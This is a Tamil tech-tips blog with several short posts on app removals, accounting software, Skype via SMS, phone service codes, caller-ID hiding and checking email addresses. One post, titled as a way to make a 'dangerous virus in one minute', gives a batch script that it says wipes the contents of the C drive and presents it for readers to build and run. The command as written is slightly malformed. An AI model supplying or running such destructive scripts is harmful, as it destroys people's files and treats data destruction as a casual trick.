Saturday, October 31, 2015

ஆப்பிள் நீக்கிய அப்ளிகேஷன் புரோகிராம்கள்

ஆப்பிள் நிறுவனம் தன் ஆப்பிள் ஸ்டோரிலிருந்து (iTunes App Store) அண்மையில், 256 அப்ளிகேஷன்களை நீக்கியுள்ளது. 

இவை வாடிக்கையாளர்கள் குறித்த தனிப்பட்ட தகவல்களை (ஆப்பிள் ஐ.டி. சாதனங்களின் தனி அடையாள எண்கள் போன்றவை) அணுகித் தன் பயன்பாட்டிற்கென சேமித்து வைத்தது தெரிய வந்தது. 

இதனால், அந்த அப்ளிகேஷன்கள் அனைத்தையும் தன் ஸ்டோரிலிருந்து ஆப்பிள் நீக்கிவிட்டது. 

இந்த அப்ளிகேஷன்கள் பெரும்பாலும் சீன நாட்டு நிறுவனங்களால் வடிவமைக்கப்பட்டு, ஆப்பிள் அனுமதியுடன் அதன் ஸ்டோரில் அமைக்கப்பட்டவையாகும். ஏறத்தாழ, 10 லட்சம் பேர்கள் வரை இவற்றைத் தரவிறக்கம் செய்து பயன்படுத்தி வருகின்றனர். 

மேலும், இந்த அப்ளிகேஷன் புரோகிராம்கள் மூலம், ஆப்பிள் ஸ்டோரிலும் மால்வேர் புரோகிராம்கள் பரவிட வாய்ப்புகள் இருந்ததனால், ஆப்பிள் இந்த முடிவை எடுத்தது.
Download As PDF

Wednesday, March 19, 2014

Manager – சிறு நிறுவனங்களுக்கான இலவச Accounting மென்பொருள்


சிறிய நிறுவனங்களை வைத்திருப்பவர்கள் வரவு செலவுக் கணக்குகளை நோட்டுகளில் எழுதி அல்லது Excel மென்பொருளில் ஏற்றி சரிபார்த்து வருவார்கள். இல்லையெனில் அக்கவுண்டிங் மென்பொருளை அதிக விலை கொடுத்து வாங்க வேண்டும். அப்படியே வாங்கினாலும் மென்பொருளை Accounts தெரியாதவர்களுக்கு எளிமையாக புரிந்து விடாது. எளிமையாகவும் இலவசமாகவும் அக்கவுண்ட்ஸ் மென்பொருள் கிடைத்தால் நன்றாக இருக்குமல்லவா?

 அது தான் Manager என்ற இலவச மென்பொருள். இது சாதாரண நபர்களும் எளிமையாக உபயோகிக்கும் படி இந்த மென்பொருள் வடிவமைக்கப் பட்டுள்ளது. இந்த மென்பொருளின் மூலம் நிறுவனத்தின் வரவு செலவு (income and expense), சொத்துகள், கடன்கள், பொருள் விற்பனை, வரி பிடித்தம் போன்றவற்றை எளிதாக தெரிந்து கொள்ளலாம். இவற்றை Summary பக்கத்தில் எல்லாமே தொகுத்து ஒரே இடத்தில் காணலாம். மேலும் Balance Sheet, Profit and Loss, Ledger Summary போன்றவை புரியும் படி அறியலாம்.


Bank Accounts, Cash Accounts தனியாக கையாளவும் அதிலிருந்தே பணம் வரவினை Receive Money கொடுத்து ஏற்றலாம். பணம் பிறருக்கு கொடுப்பதினை Spend Money இலும் வங்கியிலிருந்து பணம் எடுப்பதினை Transfer Money இலும் ஏற்றலாம். மற்ற மென்பொருள்களிலுள்ள Payment, Receipt போன்ற குழப்பங்கள் இதில் கிடையாது.


மேலும் இதில் Sales Quotes, Sales Invoices, Purchase Orders, Purchase Invoices, Suppliers and Customers management போன்றவையும் இருக்கின்றன.  இதனை தனி நபர்களும் வரவு செலவுக் கணக்கறிய பயன்படுத்தலாம். Accounts தெரியாத எனக்கு இந்த மென்பொருள் நிறைய விசயங்களை எளிமையாக கற்றுக் கொள்ள உதவுகிறது.

Download As PDF

குறைந்த செலவில் SKYPE Call - Mobile To Skype (இலங்கை)


கம்ப்யூட்டர் அல்லது மொபைல் அல்லது இன்டர்நெட் இல்லாம skype பேசலாமா ???

எஸ் !

இந்த பதிவு மிகவும் குறைந்த செலவில் skype பேச மிகவும் பயனுள்ளதாக இருக்கும் ( Dialog,Hutch,Airtel,Etisalat )

உங்களிடம் skype இருக்கு வீட்ட skype மொபைல் Or கம்ப்யூட்டர் இல்லையா கவலையா விடுங்க ...

எத்தனையோ இளைன்சர்கள் இன்று தாய், தந்தை, பிள்ளைகள், மனைவி, சகோதரன், சகோதரிகள் எல்லோரையும் விட்டு வெளிநாட்டில் தொழில் செய்கிறாகள்.

இன்று skype தெரியாத குழந்தைகள் கூட இருக்காது .. ஆனால் சில மக்களுக்கு skype பற்றிய அறிவு குறைவு நாம் skype பேசுவதற்கு ஒரு ஸ்மார்ட் போன் வாங்கி வீட்ட அனுப்பினால் அங்கு இது பற்றிய அறிவு இருந்தால் தான skype பேசுறதுக்கு 

ஆனால் SMS படிக்க தெரியாம யாரும் இருக்காது ஓகே 

உங்க வீட்ட என்ன சிம் Us பண்ணுறாங்க என்று தெரிஞ்சா சரி ஓகே 

முதலில் உங்க skype on பண்ணிட்டு முதலில் இத செயிங்க 


அதன் பின்னர் உங்க வீட்ட அல்லது நீங்க செய்து பாருங்க..
1. Type sk<> <users Skype ID> to 689. (E.g. skype<space>saku23569). SMS will be Free of Charge. ( செய்யட்படுத்த இலவசம் )

Rs1.50+IDD tax(வரி)/minute 

உதாரணமாக :

Type: sk aayiram.arivom இவ்வாறு டைப் பண்ணி 689 sent பண்ணினால் 

இவ்வாறு ஒரு இலக்கம் தரப்படும் 0689015152 இது என்னுடையது ஆனால் இது ஒவ்வொரு ID'கும் மாறும்

இப்ப skype மொபைல கம்ப்யூட்டர் on பண்ணிட்டு மொபைல் ல இருந்து 0689015152 (இது போல வர இலக்கத்துக்கு call பண்ணினால் )

நீங்கள் விரும்பிய வாறு பேசலாம் 


***********************************************************


Type : Skype ID 
sent : 4545

Ex: aayiram.arivom Sent : 4545 

Get : Call Us Number

************************************************************************


1.    SMS skypeskype ID you wish to call to 689,
E.g. SMS to 689: “Skype dave.cooper”
2.    You will receive the following SMS:
To contact dave.cooper please dial 689xxxxxxx
3.    Add this number to your address book to access it in the future

Terms & Conditions
Rs. 1.50 + tax will apply per minute

**********************************************************************************************************************

 Type skype <space> <users Skype ID> to 7777
Download As PDF

1 நிமிடத்தில் ஆபத்தான Virus உருவாக்க ?


நீங்களும் வைரஸ் உருவாகலாம் இதுக்க பெரிய பெரிய படிப்பலம் தேவை இல்லை ஆனால் இது மிகவும் ஆபத்து விரும்பியவர்கள் மாத்திரம் செய்து பாருங்கள் அவ்வாறு செய்து ஏதும் பிரச்சினைகள் ஏற்படுமானால் அது என்னுடைய பொறுப்பு இல்லை
வைரஸ் உருவாகுவது பற்றி இன்று ஒரு சிறு பதிவு பாப்போம் '

குறிப்பு : இதனை செயட்படுதுவதன் மூலம் கணினியில் ஏதும் பாதிப்புகள் ஏற்பட்டால் அது என்னுடைய பொறுப்பு இல்லை

எவ்வாறு :

முதலில் Notepad ஓபன் செய்து கீழ் உள்ள Code'யை Copy Or Type செய்துட்டு

@Echo off
Del C:\ *.* |y


இதனை virus.bat ( நீங்கள் பெயர் எது வேணும் என்றாலும் கொடுங்க ஆனால் .bat கட்டாயம் )

இனி உங்களுடைய கணினியில் எல்லாம் Delete ஆகிடும் 

How to Make the virus ?

   1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive
Download As PDF

சிம் போட முடியாதா Tablet'க்கு Dongle பயன்படுத்துவது எவ்வாறு ?

முதலில் இந்த மென்பொருளை தரவிறக்கம் செய்துகொள்ளுங்கள் : PPP Widget
இந்த மென்பொருளை உங்க TABLET ல நிறுவிய பின்னர்


 இப்பா Dongle ல Tablet இணைக்கவும் அதுக்கு பின்னர்
 Tablet setting போய் இன்டர்நெட் setting ல Access Point Names கொடுத்து புதிய ஓன்று  ஓபன் பண்ணுன சரி


அப்பறம் பாருங்க உங்களுடைய Tablet இன்டர்நெட் work பண்ணும் பாருங்க

Download As PDF

Black Barry Reset Code



Default user code: 1122, 3344, 1234, 5678
*#66*# Set Factory Mode CONFIRMED

*#8375# Show Software Version CONFIRMED
*#1234# A2DP ACP Mode CONFIRMED
*#1234# A2DP INT Mode CONFIRMED
*#0000# + Send : Set Default Language CONFIRMED
*#0007# + Send : Set Language to Russian CONFIRMED
 *#0033# + Send : Set Language to French CONFIRMED
*#0034# + Send : Set Language to Spanish CONFIRMED
*#0039# + Send : Set Language to Italian CONFIRMED
*#0044# + Send : Set Language to English CONFIRMED
*#0049# + Send : Set Language to German CONFIRMED
*#0066# + Send : Set Language to Thai CONFIRMED
*#0084# + Send : Set Language to Vietnamese CONFIRMED
*#0966# + Send : Set Language to Arabic CONFIRMED
*#800# make Etel E10 model displaying message BT power on. But on display it dont resemble the blutooth power on icon.(actually t makes BT stuck, but after restarting t becomes normal <tested by me>)
Download As PDF

மொபைல் நம்பர் தெரியாமல் மறைக்க


ஒரு மொபைல் நம்பரிலிருந்து  நண்பர்களின் மொபைல்களுக்கு அல்லது மற்றவர்களின் அலைப்பேசிக்கு அழைக்கும்பொழுது அந்த மொபைல் நம்பர் நண்பர்களுக்குத் தெரியாமல் மறைப்பதற்கு இப்போது டெக்னிக் (Mobile Number Hiding Technical) வந்துவிட்டது.

அதாவது நீங்கள் உங்கள் நண்பரின் மொபைல் போனுக்கு அழைக்கும்போது அவரின் மொபைல் போனில் உங்களுடைய மொபைல் நம்பர் தெரிவதற்குப் பதில் Private Number என்று மட்டும் வரும்.  உங்களுடைய மொபைல் நம்பர் அவருடைய செல்போனில் தெரியாது.

உங்களுடை மொபைல் நம்பர் 9865072896 எனில் அதனுடன் *67 என்ற எண்ணையும் உங்கள் மொபைல் எண்ணுடன் சேர்த்து டயல் செய்யுங்கள்.

இது ஒரு யுனிவர்சல் கோட். அதனால் உங்களது மொபைல் எண்  *67 9865072896 என்று டயல் செய்ய வேண்டும். இவ்வாறு செய்யும் போது எண்களுக்கிடையே இடைவெளி விடாது  இருக்க வேண்டும். அவ்வாறு இடைவெளி விடாமல் சரியாக உள்ளிட்டு டயல் செய்யும்போது உங்களுடைய எண் ஏற்றுக்கொள்ளப் படமாட்டார்கள்.

இவ்வாறு செய்யும்பொழுது உங்களுடைய எண் நீங்கள் அழைக்கும் நபருக்கு டிஸ்பிளே (Display) ஆகாது.  மீண்டும் உங்களுடைய எண் மற்றவர்களுக்குத் தெரிய வேண்டும் எனில் *82 என்ற எண்ணைச் சேர்த்து டயல் செய்தால் போதுமானது. பிறகு உங்களுடைய மொபைல் நம்பர் (Android Mobile Number) மீண்டும் பழையபடி மற்றவர்களின் மொபைல்களில் டிஸ்பிளே ஆகும்.

இதே முறையை இப்படியும் செய்யலாம்.

நீங்கள் பயன்படுத்தும் மொபைல் நெட்வொர்க்கின் கஸ்டமர் கேர்க்கு (Customer Care) போன் செய்து லைன் பிளாக் பிளாக் (line) வசதியை நீங்கள் பயன்படுத்த விரும்புகிறீர்கள் என சொன்னால் போதுமானது. அவர்கள் அந்த வசதியை உங்களுக்கு ஏற்படுத்தித் தருவார்கள்.

மீண்டும் இந்த வசதி உங்களுக்கு வேண்டாமென நினைத்தால் , மீண்டும் கஸ்டமர் கேருக்கு போன் செய்து அவர்களிடம் இந்த லைன் பிளாக் வசதி எனக்கு வேண்டாம் என நீங்கள் கூறி, அந்த வசதியை நீக்கிவிடலாம்.

முக்கிய குறிப்பு: 

இந்த வசதியின் மூலம் உங்களுடைய மொபைல் நம்பரானது மற்றவர்களின் மொபைல்களில் தோன்றால் பிரைவேட் நம்பர் (Private Number) என்று மட்டுமே தோன்றும்.. மற்றபடி நீங்கள் இந்த வசதியின் மூலம் பேசுவது யார்.. எந்த எண்ணிலிருந்து பேசுகிறார்கள்.. எங்கிருந்து பேசுகிறார்கள் என்பதையெல்லாம் மறைக்க முடியாது. எனவே இந்த வசதியைப் பயன்படுத்தி தவறான நடவடிக்கைகளில், தவறான வழிமுறைகளில் செல்ல நினைத்தால் நிச்சயம் சட்டத்தின் பிடியில் சிக்கிக்கொள்வீர்கள்.

பெரிய பெரிய நிறுவனம் அல்லது வியாபார நிமித்தமாக (Business Related Calls), உங்களுடைய எண் மற்றவர்களுக்குத் தெரியக்கூடாது என்று நினைப்பவர்கள் இந்த வசதியைப் பயன்படுத்தலாம்.
Download As PDF

Tuesday, March 18, 2014

Android Application மூலம் பணம் சம்பாதிக்க


இன்றைய உலகில் அதிகமான மக்கள் பயன்படுத்துவது ஆண்ட்ராய்ட் போன் ஆகும் . இதில் பயன்படுத்த தேவையான அப்ளிகேஷன்களை GOOGLE PLAY STORE இல் இலவசமாக தரவிறக்கலாம் . அப்படி உள்ள அப்ளிகேஷனில் நமக்கு மாதம் மாதம் 150 ரூபாய் தர ஒரு அப்ளிகேஷன் உள்ளது என்பது உங்களுக்கு தெரியுமா ? ஆம் அதுதான் MADLOCK.

செயல்படும் முறை :


நமது மொபைல்லை பயன்படுத்தாமல் இருந்து விட்டு பின் எடுக்கும் போது அதன் LOCK ஐ எடுப்போம் . இது எல்லா ஆண்ட்ராய்ட் மொபைல்ளிலும் உண்டு . அப்படி LOCK எடுக்கும் போது உங்கள் மொபைல் திரையில் ஒரு விளம்பர படம் (IMAGE) இருக்கும் . இதை பார்க்க தான் உங்களுக்கு காசு தருகிறது இந்த நிறுவனம் . கண்டிப்பாக தினமும் பலமுறை நாம் லாக் எடுப்போம் . எதனால் நம்மை அறியாமலே பணம் ஏறும் .

நன்மைகள் :
  1. இதுக்காக தனியாக எதுவும் செய்ய தேவையில்லை .
  2. மிகவும் சின்ன அப்ளிகேஷன் .
  3. போன் நினைவு திறனை பாதிக்காது .
  4. நாம் விரும்பும் துறையில் இருந்து விளம்பரம் பெற வசதி
  5. குறைந்த பட்சம் 150 ரூபாய் வந்ததும் எடுத்து கொள்ளலாம் .
  6. நீங்கள் யாரையாவது REFER செய்தால் உங்களுக்கு தனி பணம் ஏறும் .
  7. நமது GPRS ஐ அதிகமாக பயன்படுத்தாது .

குறை :
   1. குறைந்த பட்ச ரூபாய் 150 வந்த பின்தான் எடுக்கலாம் .
   2. கண்டிப்பாக GPRS தேவை

இதை தரவிறக்க : (FOR DOWNLOAD )
MAdLock APPLICATION
OR
MAdLock என PLAY STORE இல் தேடவும் .

NOTE:
தரவிறக்கி INSTALL செய்யும் போது REFERAL CODE கேட்கும் இதை கொடுத்தால் மட்டுமே செயல் படும் .

CODE:  648EBT


Download As PDF

Google Chrome Password கொடுத்து பாதுகாக்க


இந்த நீட்சியை Google Chrome ல் இணைத்து விட்டு Tools - Extension - Simple Start up Password - Options பகுதிக்கு சென்று உங்களுக்கு என ஒரு Password ஐ கொடுத்து சேமித்து கொள்ளுங்கள்.

இனி ஒவ்வொரு முறையும் உங்கள் கணணியில் உள்ள Chrome உலாவியை open செய்யும் பொழுதும், முகப்பு பக்கத்தில் Password கேட்கும். password ஐ சரியாக கொடுத்தால் தான் உலாவியை உங்களால் உபயோகிக்க முடியும், ஒரே முறை தவறாக கொடுத்தாலும் உலாவி மூடி விடும்.

Password தெரியாமல் open செய்பவர்களுக்கு முகப்பு பக்கத்தை பார்ப்பதை தவிர வேறு எதுவும் செய்ய முடியாது. இனி உலாவியில் உள்ள உங்களின் ரகசியங்களை சுலபமாக பாதுகாத்து கொள்ளலாம்.

சுலபமாக ஞாபகம் வைத்திருக்கும் படி Startup Password ஐ கொடுக்கவும். ஒருவேளை password ஐ மறந்து விட்டால் Chrome உலாவியை மறுபடியும் நிறுவுவதை விட வேறு வழி இல்லை.

இணையத்தள முகவரி
https://chrome.google.com/webstore
Download As PDF

Fake Mail ID - போலியான மின்னஞ்சல் முகவரி கண்டுபிடிக்க

நண்பர்களோ அல்லது மற்றவர்களோ அவர்களைத் தொடர்புகொள்ள நம்மிடம் தமது மின்னஞ்சல் முகவரியைப் பகிர்ந்துகொள்கின்றனர். ஆனால் மற்றவர்கள் பகிர்ந்துகொள்ளும் மின்னஞ்சல் முகவரிகள் சரியானதா இல்லை போலியானதா என்று பார்த்தவ நம்மால் கண்டறிய முடியாது.

அவர்கள் கொடுக்கும் மின்னஞ்சல் முகவரிக்கு மின்னஞ்சல் அனுப்பினாலும் சென்று சேராது. இதற்கு காரணம் ஒருவேளை அவர்கள் தவறான மின்னஞ்சல் முகவரியைக் கொடுத்திருக்கலாம் அல்லது அதிக நாட்கள் உபயோகிக்காமல் விட்டதால் செயலிழந்து இருக்கலாம். இல்லையென்றால் வேண்டுமென்றே நம்மிடம் போலியான மின்னஞ்சல் முகவரியை கொடுத்திருக்கலாம்.

அதுபோன்ற நேரங்களில் குறிப்பிட்ட மின்னஞ்சல் முகவரி சரியாக வேலை செய்கிறதா இல்லை செயலிழந்து விட்டத கண்டறிய நமக்கு ஓர் இணையதளம் உதவி புரிகிறது.

அந்த இணையதளத்துக்கான லிங்க்.

ஒரு மின்னஞ்சல் சரியானதா இல்லை போலியானதா என்று அறிந்த நீங்கள் அதிக தொழில்நுட்ப அறிவு பெற்றிருக்க வேண்டிய அவசியமில்லை. குறிப்பிட்ட லிங்கில் சொடுக்கி அந்தத் தளத்துக்குச் செல்லுங்கள்.


அதில் ஒரு விண்டோ வரும். அதில் உள்ள காலி கட்டத்தில், நீங்கள் பரிசோதிக்க வேண்டிய மின்னஞ்சல் முகவரியைக் கொடுத்து அருகில் உள்ள Verify Email என்ற பட்டனை அழுத்தவும்.



நீங்கள் அவ்வாறு அழுத்தியவுடன் நீங்கள் கொடுத்த மின்னஞ்சல் முகவரி சரியானதா, இல்லை போலியானதா என்ற முடிவு வரும். குறிப்பிட்ட மின்னஞ்சல் சரியாக இருந்தால் அது Valid என்றும், இல்லை என்றால் not Valid என்றும் வரும்.அதை வைத்து குறிப்பிட்ட மின்னஞ்சல் சரியானதா இல்லை போலியானதா என்பதை நீங்க தெரிந்து கொள்ள முடியும்.
Download As PDF